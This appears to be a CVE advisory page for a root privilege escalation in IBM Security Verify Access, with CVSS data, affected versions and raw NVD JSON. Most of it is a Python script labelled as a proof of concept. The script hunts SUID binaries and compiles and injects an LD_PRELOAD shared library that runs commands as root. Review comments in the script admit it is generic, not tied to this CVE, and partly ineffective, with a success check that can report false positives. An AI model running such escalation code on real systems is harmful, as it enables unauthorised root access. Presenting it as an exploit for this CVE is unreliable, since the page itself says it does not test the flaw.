Security Vulnerability Report
CVE-2025-36356 CVSS 9.3 CRITICAL

CVE-2025-36356

Published: 2025-10-06 17:16:06
Last Modified: 2025-12-15 19:20:17

Description

IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 could allow a locally authenticated user to escalate their privileges to root due to execution with more privileges than required.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access_docker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access:11.0.1.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access_docker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access_docker:11.0.1.0:-:*:*:*:*:*:* - VULNERABLE
IBM Security Verify Access 10.0.0.0 - 10.0.9.0
IBM Security Verify Access Docker 10.0.0.0 - 10.0.9.0
IBM Security Verify Access 11.0.0.0 - 11.0.1.0
IBM Security Verify Access Docker 11.0.0.0 - 11.0.1.0

PoC / Exploit Code

⚠ For Security Research Only
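The following code is for security research and authorized testing only. It is a generic concept illustration: the description above names no specific binary or technique, so the script's output is not a test for this CVE.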
python
# CVE-2025-36356 - IBM Security Verify Access Local Privilege Escalation PoC
# This PoC demonstrates the concept of exploiting a SUID binary or
# a service running with root privileges to escalate privileges.
#
# NOTE(review): the source listing was collapsed onto three lines; line breaks,
# indentation and whitespace inside string literals below are reconstructed.
#
# NOTE(review): nothing in this script is specific to CVE-2025-36356. The
# install paths are hard-coded and the techniques are generic; the CVE
# description only states "execution with more privileges than required".
# A run that reports no escalation therefore says nothing about whether a host
# is affected -- compare the installed version with the affected ranges and
# the vendor advisory instead.
import os
import subprocess
import sys


def check_ibm_verify_access():
    """Check if IBM Security Verify Access is installed on the system.

    Returns the first path from a fixed candidate list that exists on disk,
    or None when none of them exists.
    """
    # Common installation paths for IBM Security Verify Access
    # NOTE(review): these are hard-coded candidates; whether they match a real
    # deployment is not established anywhere on this page -- TODO confirm.
    install_paths = [
        "/opt/ibm/verify-access",
        "/opt/IBM/Security/VerifyAccess",
        "/usr/local/ibm/verify-access",
        "/var/ibm/isva"
    ]
    for path in install_paths:
        # Existence of the directory is the only check; no version is read.
        if os.path.exists(path):
            print(f"[+] Found IBM Security Verify Access at: {path}")
            return path
    print("[-] IBM Security Verify Access not found.")
    return None


def find_suid_binaries(install_path):
    """Find SUID binaries within the IBM Security Verify Access installation.

    Runs `find <install_path> -perm -4000 -type f` and returns its output
    lines as a list, or an empty list when nothing is printed or the call
    raises.
    """
    print(f"[*] Searching for SUID binaries in {install_path}...")
    try:
        result = subprocess.run(
            ["find", install_path, "-perm", "-4000", "-type", "f"],
            capture_output=True, text=True, timeout=30
        )
        # find's exit status and stderr are not inspected, so unreadable
        # sub-directories are skipped silently.
        suid_bins = result.stdout.strip().split("\n")
        # split() on empty output yields [""], hence the second condition.
        if suid_bins and suid_bins[0]:
            print(f"[+] Found {len(suid_bins)} SUID binaries:")
            for binary in suid_bins:
                print(f" -> {binary}")
            return suid_bins
    except Exception as e:
        # Broad catch: a timeout or a missing `find` is only printed.
        print(f"[-] Error searching for SUID binaries: {e}")
    # NOTE(review): placement of this return (function level rather than
    # inside the except) is inferred from the collapsed listing.
    return []


def exploit_privesc(target_binary):
    """
    Attempt privilege escalation by exploiting a binary that runs
    with excessive privileges.

    Returns True only when /tmp/root_proof.txt exists after the target has
    been run, otherwise False.
    """
    print(f"[*] Attempting privilege escalation via: {target_binary}")
    # Common exploitation techniques:
    # 1. Path hijacking - if the binary calls other commands without full path
    # 2. Shared library injection - LD_PRELOAD attack
    # 3. Command injection via arguments

    # Technique 1: Check if binary is vulnerable to path hijacking
    # NOTE(review): ldd lists shared-library dependencies; it does not show
    # whether the binary resolves helper commands through PATH, so this output
    # does not test what the message claims. ldd(1) also warns against running
    # it on untrusted executables.
    print("[*] Checking for path hijacking vulnerability...")
    ldd_result = subprocess.run(
        ["ldd", target_binary], capture_output=True, text=True
    )
    print(f"[*] Library dependencies:\n{ldd_result.stdout}")

    # Technique 2: Try to exploit via shared library injection
    # NOTE(review): on glibc systems the dynamic loader runs set-user-ID
    # programs in secure-execution mode and ignores LD_PRELOAD entries that
    # contain a slash, so a library under /tmp is not expected to load into a
    # SUID target. This step does not demonstrate the CVE.
    print("[*] Attempting LD_PRELOAD injection...")
    payload_c = """
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    if (getuid() == 0) {
        system("/bin/bash -c 'id > /tmp/root_proof.txt; echo \"Privilege escalation successful\" > /tmp/privesc_result.txt'");
    }
}
"""
    # Host artefacts of this step, useful for detection and clean-up: it
    # writes /tmp/payload.c and /tmp/payload.so, and the payload targets
    # /tmp/root_proof.txt and /tmp/privesc_result.txt. None are removed.
    payload_path = "/tmp/payload.c"
    so_path = "/tmp/payload.so"
    with open(payload_path, "w") as f:
        f.write(payload_c)
    # Compile the shared library
    compile_result = subprocess.run(
        ["gcc", "-shared", "-fPIC", "-nostartfiles", "-o", so_path, payload_path],
        capture_output=True, text=True
    )
    if compile_result.returncode == 0:
        print(f"[+] Payload compiled successfully: {so_path}")
        # Attempt exploitation
        env = os.environ.copy()
        env["LD_PRELOAD"] = so_path
        # The target's output is captured but never inspected.
        result = subprocess.run(
            [target_binary], env=env, capture_output=True, text=True, timeout=10
        )
        # Check if exploitation was successful
        # The marker path is fixed and never cleared, so a file left by an
        # earlier run (or created by any local user) is reported as success.
        if os.path.exists("/tmp/root_proof.txt"):
            with open("/tmp/root_proof.txt", "r") as f:
                print(f"[+] Exploitation successful! Root proof: {f.read()}")
            return True
        else:
            print("[-] LD_PRELOAD technique did not succeed.")
    else:
        print(f"[-] Failed to compile payload: {compile_result.stderr}")
    return False


def main():
    """Run the three steps in order: locate install, list SUID files, try each."""
    print("=" * 60)
    print("CVE-2025-36356 PoC")
    print("IBM Security Verify Access Local Privilege Escalation")
    print("=" * 60)
    # Check current user
    current_uid = os.getuid()
    print(f"[*] Current UID: {current_uid}")
    if current_uid == 0:
        print("[!] Already running as root. Nothing to escalate.")
        return
    # Step 1: Find IBM Security Verify Access installation
    install_path = check_ibm_verify_access()
    if not install_path:
        print("[-] Target application not found. Exiting.")
        sys.exit(1)
    # Step 2: Find SUID binaries
    suid_binaries = find_suid_binaries(install_path)
    if not suid_binaries:
        print("[-] No SUID binaries found. Trying alternative methods...")
        # Try to find running processes with root privileges
        # Only prints matching `ps aux` lines; nothing is done with them.
        ps_result = subprocess.run(
            ["ps", "aux"], capture_output=True, text=True
        )
        for line in ps_result.stdout.split("\n"):
            if "isva" in line.lower() or "verifyaccess" in line.lower():
                print(f"[*] Found related process: {line}")
    # Step 3: Attempt exploitation
    for binary in suid_binaries:
        if os.path.isfile(binary):
            if exploit_privesc(binary):
                print("[+] Privilege escalation completed successfully!")
                break
    else:
        # for/else: reached when the loop ends without break, which includes
        # the case of an empty suid_binaries list.
        print("[-] Could not escalate privileges with available methods.")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36356", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:05.507", "lastModified": "2025-12-15T19:20:17.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 could allow a locally authenticated user to escalate their privileges to root due to execution with more privileges than required."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "CCA4ADF8-014B-4A43-AE12-CC7D46B0F8BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "9916DF0F-8A3E-4CB4-957F-286E168666A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "05FBA01C-DDCD-4B80-B14B-81DAB052CC8D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "149CA168-1117-4B50-8F5A-B72D4BCC65F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "FFF4D7D4-0D01-44CA-84A2-2EA59802D1CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "7E76C6CF-1E2A-403E-9C7F-619BE2057468"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "B8BF3374-6B03-4A25-9F4D-F88C091804C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "C8D09601-F55B-4307-8BEE-218F5CAC2138"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "16595130-3A46-4DD1-9DAA-53E534306975"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "4A7A934C-F8B6-44D1-9591-A3FDB86BEECB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "81BD4D96-C9E9-422B-B18A-61ECFE711884"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "0C06D5AD-67DD-46FA-BDF7-39A2E0EAAF95"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247215", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}